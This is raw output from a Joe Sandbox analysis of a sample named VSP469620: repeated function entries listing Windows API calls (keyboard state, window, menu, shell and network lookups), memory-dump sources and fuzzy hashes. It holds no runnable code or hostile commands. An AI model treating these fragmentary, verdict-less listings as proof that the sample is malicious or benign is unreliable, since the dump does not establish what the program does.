                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 276eab35ca0626b93870622389f14b6c29aec68533835e8cbdc55d97283df7d4
                                                              • Instruction ID: 13934caa3c483b0480229c556504258d1912f36f7a261ce16b2dbd58dd887780
                                                              • Opcode Fuzzy Hash: 276eab35ca0626b93870622389f14b6c29aec68533835e8cbdc55d97283df7d4
                                                              • Instruction Fuzzy Hash: 3B2142B4204609AFE7115BB0EC89B3E3FAAFB44744F110014F609871B2CF719D90EB65
                                                              Function 00B002EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CoInitialize.OLE32(00000000), ref: 00B0034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B003DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00B003F2
                                                              • CoCreateInstance.OLE32(00B3DA8C,00000000,00000001,00B63CF8,?), ref: 00B0043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B004AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00B00505
                                                              • _memset.LIBCMT ref: 00B00542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00B0057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B005A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00B005A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B005DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00B005E1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 7e199364e695ffd3da2fd6ebf8339c23e076dbcbd3ab94b8d1c3e1716d8bcb49
                                                              • Instruction ID: 587efba5480ef39c1b514d6ddd942b8dd356ef4325e9af501e7e433520758ac4
                                                              • Opcode Fuzzy Hash: 7e199364e695ffd3da2fd6ebf8339c23e076dbcbd3ab94b8d1c3e1716d8bcb49
                                                              • Instruction Fuzzy Hash: B0B1D775A00208AFDB14EFA4D989EAEBBF9EF48314F148499F905EB251DB31ED41CB50
                                                              Function 00AF2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00AF2ED6
                                                              • SetKeyboardState.USER32(?), ref: 00AF2F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00AF2F61
                                                              • GetKeyState.USER32(000000A0), ref: 00AF2F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00AF2FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00AF2FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00AF2FE4
                                                              • GetKeyState.USER32(00000011), ref: 00AF2FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00AF301B
                                                              • GetKeyState.USER32(00000012), ref: 00AF3029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00AF3052
                                                              • GetKeyState.USER32(0000005B), ref: 00AF3060
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 82df0aed7eb81a02e35fe87831e64978c71212e7cf75425551e200ed6979fe0b
                                                              • Instruction ID: c384449093f63d692aa8e465cf6f1299d32e4caed96e8e43fe5003fcdeb942f4
                                                              • Opcode Fuzzy Hash: 82df0aed7eb81a02e35fe87831e64978c71212e7cf75425551e200ed6979fe0b
                                                              • Instruction Fuzzy Hash: 3951A661A0478C29FB35EBE489117FABFB45F11384F08459EE7C2571C2DA949B8CC762
                                                              Function 00AEED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 00AEED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AEED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 00AEED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEEDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AEEE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEEE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AEEE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00AEEE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AEEE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00AEEE9B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 081371f5a06cfcff993425ae863f1b758a141a21e4edb1371e5af664242b17a9
                                                              • Instruction ID: e163654f3b334f621e5736c74e566004c90d6fd86ed50dec4ca76a1f27c19851
                                                              • Opcode Fuzzy Hash: 081371f5a06cfcff993425ae863f1b758a141a21e4edb1371e5af664242b17a9
                                                              • Instruction Fuzzy Hash: BA5110B1B00605AFDF18CF69DD96AAEBBBAFB88700F14852DF519D7290DB709D008B10
                                                              Function 00ACB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ACB759,?,00000000,?,?,?,?,00ACB72B,00000000,?), ref: 00ACBA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00ACB72B), ref: 00ACB7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00ACB88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B2D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D90A
                                                              • DeleteObject.GDI32(00000000), ref: 00B2D91C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: 1fbe6a94fc08c184beed7b0edf3d2d0a93755e238045396c4b8d9b6f35b75a07
                                                              • Instruction ID: 89b87c29f31a9f618cf3ad2ac9c2bb6be8d1948a537380ab19f47ec7f758f93e
                                                              • Opcode Fuzzy Hash: 1fbe6a94fc08c184beed7b0edf3d2d0a93755e238045396c4b8d9b6f35b75a07
                                                              • Instruction Fuzzy Hash: 1B617D30511610DFDB259F1CE98AB2977F5FB94711F26491DE44A97A70CB36A8C0CFA0
                                                              Function 00ACB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB526: GetWindowLongW.USER32(?,000000EB), ref: 00ACB537
                                                              • GetSysColor.USER32(0000000F), ref: 00ACB438
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 69f215cacef3bd3a6148e8c0ccbd595a56dcf8c8377d78202877e08630171ac7
                                                              • Instruction ID: 69688350df9c81adad3f6cd8c601e466b2706dd58024242fefecd8847ddaefa0
                                                              • Opcode Fuzzy Hash: 69f215cacef3bd3a6148e8c0ccbd595a56dcf8c8377d78202877e08630171ac7
                                                              • Instruction Fuzzy Hash: F541B2300145509FDF246F28E98AFB937A5EB05721F2642A9FD658F1E6CB328C41D731
                                                              Function 00AF690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              • Opcode ID: 985b46aa3454325b7af8a4a88e80f75a45fa28074b19a5fddd04d5d75784d50e
                                                              • Instruction ID: f8dbdb403f0dd4a9c276965cc2d97f6ff633638b19aec78f5d3c3c1fc90ee927
                                                              • Opcode Fuzzy Hash: 985b46aa3454325b7af8a4a88e80f75a45fa28074b19a5fddd04d5d75784d50e
                                                              • Instruction Fuzzy Hash: 93411B7684511CAECF61EB90CD86DDA73BDEB44300F0041E7B69AA2151EB71ABE88F50
                                                              Function 00AFD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(00B4DC00,00B4DC00,00B4DC00), ref: 00AFD7CE
                                                              • GetDriveTypeW.KERNEL32(?,00B63A70,00000061), ref: 00AFD898
                                                              • _wcscpy.LIBCMT ref: 00AFD8C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: b625dce8bf904759ce7c5b68d37894eed0fd7b473b259f6043ed051ed09a7ea6
                                                              • Instruction ID: dc2976b446e02df57f8629a610e38ddd2de30198fb517657ff749a9ca079ea43
                                                              • Opcode Fuzzy Hash: b625dce8bf904759ce7c5b68d37894eed0fd7b473b259f6043ed051ed09a7ea6
                                                              • Instruction Fuzzy Hash: 33519F31108208AFC701EF54D982BBEB7E6EF84754F10892DF69A572A2DB71D905DA82
                                                              Function 00AB936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 00AB93AB
                                                              • __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00AD1557: _xtow@16.LIBCMT ref: 00AD1578
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              • Opcode ID: 702f2a893139a7caab63119511a36f0e6e0de834f22e8eab881e2fc2b8253073
                                                              • Instruction ID: 425320f5a757739dc0843e6a85ee5add2ef7d270f6db4cd66db249ca29688539
                                                              • Opcode Fuzzy Hash: 702f2a893139a7caab63119511a36f0e6e0de834f22e8eab881e2fc2b8253073
                                                              • Instruction Fuzzy Hash: 5C41D671504214AFDB24DB78EA41FAA77F8EF44300F2044AEE54AD7692EA72D941CB10
                                                              Function 00B1A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B1A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00B1A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B1A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B1A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B1A286
                                                              • DeleteDC.GDI32(00000000), ref: 00B1A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B1A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B1A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B1A2B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 3b7380ea72d8e2161fde134f932d4b7c6d8aa39fff2b32fd226c326afdb8230e
                                                              • Instruction ID: 649b046d5b6423e54d511418d5cbd1f3ce67520fbc4297895ec68d99a0d64437
                                                              • Opcode Fuzzy Hash: 3b7380ea72d8e2161fde134f932d4b7c6d8aa39fff2b32fd226c326afdb8230e
                                                              • Instruction Fuzzy Hash: 3A317031101215BBDF115FB4EC49FDE3BA9FF09760F210214FA29A61A0CB35E861DBA5
                                                              Function 00AF6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              • Opcode ID: 930965547783d28402384722c6c534ac41ebb9596f312cdbb561397ee1812bf0
                                                              • Instruction ID: 30fe34bab995717bcf6e4df263f5caa18eccbd9006db401294ec9693e6dca608
                                                              • Opcode Fuzzy Hash: 930965547783d28402384722c6c534ac41ebb9596f312cdbb561397ee1812bf0
                                                              • Instruction Fuzzy Hash: 18110671504119AFCB24ABB0AD4AEEE77BCEF40710F1001AAF245A7091EF70DE818B50
                                                              Function 00AD500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AD5047
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __gmtime64_s.LIBCMT ref: 00AD50E0
                                                              • __gmtime64_s.LIBCMT ref: 00AD5116
                                                              • __gmtime64_s.LIBCMT ref: 00AD5133
                                                              • __allrem.LIBCMT ref: 00AD5189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD51A5
                                                              • __allrem.LIBCMT ref: 00AD51BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD51DA
                                                              • __allrem.LIBCMT ref: 00AD51F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD520F
                                                              • __invoke_watson.LIBCMT ref: 00AD5280
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction ID: 0fe121124c70b016bcb5fade2f7ba821373b1c0387332502154216d726f6deeb
                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction Fuzzy Hash: F971C472E00B16ABE714AF79CD41BAAB3A8AF14764F14422BF512DA381E770DD448BD0
                                                              Function 00AF4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF4DF8
                                                              • GetMenuItemInfoW.USER32(00B71708,000000FF,00000000,00000030), ref: 00AF4E59
                                                              • SetMenuItemInfoW.USER32(00B71708,00000004,00000000,00000030), ref: 00AF4E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00AF4EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00AF4EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00AF4F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00AF4F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00AF4F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF4FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4FEB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: bf03fd3d781efaa0d7edd78a33fc9c333298e1cda2e048417a1161bcba1f438b
                                                              • Instruction ID: 2e34d62fe241b0c25457c7e455b305b9dd43b8adcb02a360463062908786a60c
                                                              • Opcode Fuzzy Hash: bf03fd3d781efaa0d7edd78a33fc9c333298e1cda2e048417a1161bcba1f438b
                                                              • Instruction Fuzzy Hash: BA618B7190024DAFDB21CFA8D988ABF7BB8FB49718F140559F646A7251DB30AD45CB20
                                                              Function 00B19C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B19C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B19C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B19CBF
                                                              • _memset.LIBCMT ref: 00B19CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B19CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B19D5A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 8f54328e3cc83ad70fc1fcf521b8cf1f616773d18768c7509ee3cd9232c02cf8
                                                              • Instruction ID: be0e65a4cd87331075a9b751d2607205bf7a62cbeb82233154af91f2cadcde83
                                                              • Opcode Fuzzy Hash: 8f54328e3cc83ad70fc1fcf521b8cf1f616773d18768c7509ee3cd9232c02cf8
                                                              • Instruction Fuzzy Hash: 6E618D75900248AFDB10CFA8CC81EEE77F8EB09700F14459AFA15E7291D770AA82DB60
                                                              Function 00AE94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00AE94FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00AE9549
                                                              • VariantInit.OLEAUT32(?), ref: 00AE955B
